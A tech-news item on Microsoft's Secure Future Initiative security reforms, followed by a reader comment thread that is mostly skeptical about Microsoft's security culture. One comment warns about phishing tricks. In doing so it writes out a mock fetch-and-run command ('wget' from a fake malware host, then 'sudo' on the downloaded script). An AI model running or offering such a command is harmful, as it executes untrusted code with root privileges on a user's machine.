Microsoft Tightens Digital Defenses with Sweeping Security Overhaul (geekwire.com)
Microsoft unveiled detailed security reforms Monday, five months after CEO Satya Nadella pledged to prioritize cybersecurity following major breaches. The 25-page Secure Future Initiative report [PDF] outlines technical and governance changes addressing criticisms in an April 2024 Cyber Safety Review Board report that deemed Microsoft's security culture "inadequate."
Microsoft said it implemented significant security upgrades to its Entra ID and Microsoft Account systems, introducing Azure-managed hardware security modules for access token signing keys. The company has also purged 5.75 million inactive tenants to minimize potential attack vectors and adopted a new testing system with secure defaults to prevent legacy-related security issues. Concurrently, Microsoft has enhanced its network tracking capabilities, now monitoring over 99 percent of its physical network through a centralized inventory system, which aids in firmware compliance and logging.
Internal security measures have been tightened, with engineering teams facing stricter access controls. Personal access tokens are now limited to seven days, SSH access has been disabled for internal engineering repositories, and access to critical engineering systems has been restricted to fewer groups. Additionally, Microsoft has extended its audit log retention period to a minimum of two years, bolstering its ability to investigate and respond to potential security incidents.
Skipping (Score:3)
"Satya Nadella pledged to prioritize cybersecurity" - someone pick the needle up, the sound is skipping again and repeating the same old tune.
Re: (Score:2)
"Satya Nadella pledged to prioritize cybersecurity" - someone pick the needle up, the sound is skipping again and repeating the same old tune.
Maybe "cybersecurity" has a different meaning to Microsoft?
Re: (Score:2)
It essentially means "Please do not force any kind of regulation or liability on us! We will put up a show for you if you do not!" Of course, they will just remain their crappy self. They cannot do anything else. Building up a real security culture takes decades and people they do not have.
Re: (Score:2)
Internal security measures have been tightened, with engineering teams facing stricter access controls. Personal access tokens are now limited to seven days, SSH access has been disabled for internal engineering repositories
Is anyone else reading this as "we've rounded up twice the usual number of suspects"?
Re: (Score:2)
> Maybe "cybersecurity" has a different meaning to Microsoft?
They keep using that word. I do not think it means what they think it means.
I think they're serious this time (Score:5, Interesting)
It's just like back in the day with viruses: Microsoft cracked down on them with the help of the DOJ and they dried up. Yeah, I know there's still a bunch of them out there, but I knew people working at computer shops at the time and they noticed when Microsoft did the crackdown because it massively impacted their bottom line, because there were far fewer of the quick and easy virus removals that were their bread and butter.
Microsoft isn't going to be able to stop every single thing, but they'll be able to do a hell of a lot, and I don't think they're going to have much choice or they're going to start losing major business contracts. Or worse, Washington will step in and regulate them.
Re: (Score:2)
Who are they going to lose these major business contracts to? Big business is locked into the Microsoft ecosystem and it would cost a great deal of money to get out.
Re:I think they're serious this time (Score:4, Interesting)
I would think any state agencies may have the highest risk (and I myself even as a fan of Windows would say government operations should operate on as much open source as possible) but all it takes is one or two places willing to take the leap to snowball. The perception of companies moving off MS is damaging enough to warrant a response.
I would agree with GP that Microsoft is one of those American firms that not only needs regulation but is important enough to warrant some degree of state ownership. Intel, Boeing, Qualcomm and other examples where these companies are so unique in their positions that the risk of them falling under mismanagement without some degree of measurable public input is just too much.
These companies, like it or not, have an effect on everyone's lives, shareholder return cannot be the only metric they consider even just as a matter of national security.
Re: (Score:2)
and I myself even as a fan of Windows would say government operations should operate on as much open source as possible
Is that secure though? A dumb system admin who creates an insecure network is suddenly better because the software is open source? Remember it's 2024; very few attacks happen directly on the OS level these days. I mean, just yesterday we were running stories about github users being told to hit win+r and run a powershell command that installs malware on their machine, ... and people actually fall for that shit. Having the command being "wget http://totallynotmalware.com/n... && sudo ./notsuspect.sh"
Re: (Score:2)
Is there any reason it shouldn't be secure? Is there any reason a bunch of properly admined systems running Linux or BSD would be less secure than a properly set up Windows system? Doesn't matter the OS; a stupid user can bring down a system, and an improperly admined box will allow them to do it.
In that sense it's not really a matter of security, it's a matter of principle. Outside of things that fall under natsec, software the government uses should be FOSS and auditable by the public just the same, and I want the g
Re: (Score:2)
> shareholder return cannot be the only metric they consider even just as a matter of national security
That sir, is one of the most un-American things I have read today. :)~
Change begins at home (Score:2)
We're going to have to do the lifting in the development team level. Companies and other large enterprises are not going to address this within any short term horizon. It will be corporate buzzwords, strategic initiatives, 'thought leader patterns', Gartner/McKinsey consultant speak, etc. without any real action.
Suggest:
1. Start referring to the cloud (thanks /.'er) as "on other people's computers"
2. Start referring to pretend 3 year LTS (Long Term Support) releases as short lifespan releases
3. Start ref
Re: (Score:2)
There's too many nation states fucking with insecure software right now. It's at the point where Microsoft is in danger of losing important contracts.
I don't think that is the issue. I think this is a knee jerk reaction to Crowdstrike, because really what's the alternative? Linux? The fundamental problem is not Windows security, it's administration. The same idiots who create insecure systems on one network will do so on another. The same dumb users sitting on one OS diligently following the instructions in that phishing email, will do so in another.
The majority of actual meaningful attacks these days have nothing to do with the OS. They are attacks on t
So what they're actually saying... (Score:2)
If only they'd put as much effort into securing their faulty software as they put into telling everyone that they're going to do it.
Re:So what they're actually saying... (Score:5, Insightful)
If only they put as much effort into that as they did into cramming in unwanted AI, "it would be a felony for even a slightly smaller company to try this" intrusive spyware and adware, remote installation of software without authorization, unnecessary UI changes because we have to look "new", subscriptions for things that shouldn't require a subscription, forced use of online services that would reduce your attack surface if they weren't used, and pretty much anything else they've done post Windows 7, the world would be a better place.
Re: (Score:3)
I was going to write the same thing, but you beat me to it. Makes me think that "a million" other people had the same thought. If only MS actually listened or cared.
Re: (Score:3)
Microsoft, like many large corporations, no longer needs customers to survive. Sure, as an abstract concept we make certain good numbers go up, but as soon as that's no longer the case they'll stop having us as customers and exist as some weird paper entity that mints money.
Re: (Score:1)
Indeed. But you do not get rich by selling a quality product. MS got rich by pretending to sell a quality product and no liability if somebody finds out what it actually is. And having tons of fanbois with zero insight.
Re: (Score:2)
Mostly they got to where they are by holding the anterior lobes of the posteriors of business CEOs, CIOs, etc. "Look it, all this computer crap is confusing for you, we'll hold your buns for you so you don't have to."
What self-respecting CEO, CIO, etc. could ignore a pitch like that, it allowed them to get on with what they do best, "boldly leading into a synergistic future" and not pay any mind to all that confusing computer crap.
Now they had accountants who could do it for them...sez so right on the ledge
Re: (Score:2)
And that too. That is no way to select critical systems though, and the cost is rising. Last year, cybercrime in Germany was 206B EUR, that is 2600 EUR per person per year. About one average monthly salary. And most of that is due to Microsoft or the crappy ecosystem they have created.
While they will be leaving mass amounts (Score:3)
Re: (Score:2, Troll)
They are just putting on a show. They do not mean these statements seriously. MS will never produce secure systems or software or clouds unless they face liability. The very point of this show is so that they can continue to make crappy software with no liability.
How about Windows? (Score:3)
Great. Now fix your broken OS that allowed a single ClownStrike update to crater systems globally.
You know, do a sanity check on kernel extensions, and notify the systems operator whenever they are pushed. And make them easily disabled on boot. And make it clear that a new one has loaded before Windows shits the bed.
You're darned right security culture is inadequate.
Re:How about Windows? (Score:4, Informative)
Uh, it happened to Linux too.
Re: (Score:2)
No, it did not. Windows became inaccessible. On Linux you had a few minutes after boot to fix things. That is a difference like day and night.
Only for show (Score:2)
Just wait a year or two and they will be their crappy self again.
Users (Score:3)
Users are the weak link in Windows security. Eliminate them and Microsoft will go a long way towards its security goals.
Users are closely followed by the power plug. Just don't plug in a Windows box and it will be impervious to external attacks.
They'll ditch SSH ... 'nuff said about this ... (Score:3)
I almost fell off my chair laughing when I read that. It's now the hot wave of the future, everything with access tokens and Microsoft Authenticator and Microsoft whatever, all spread across a dozen domains, of which at least 2 are inoperable at every given point in time.
Holy shit, they've disabled that one protocol which actually works.
Good thing I don't work there.
And yet (Score:1)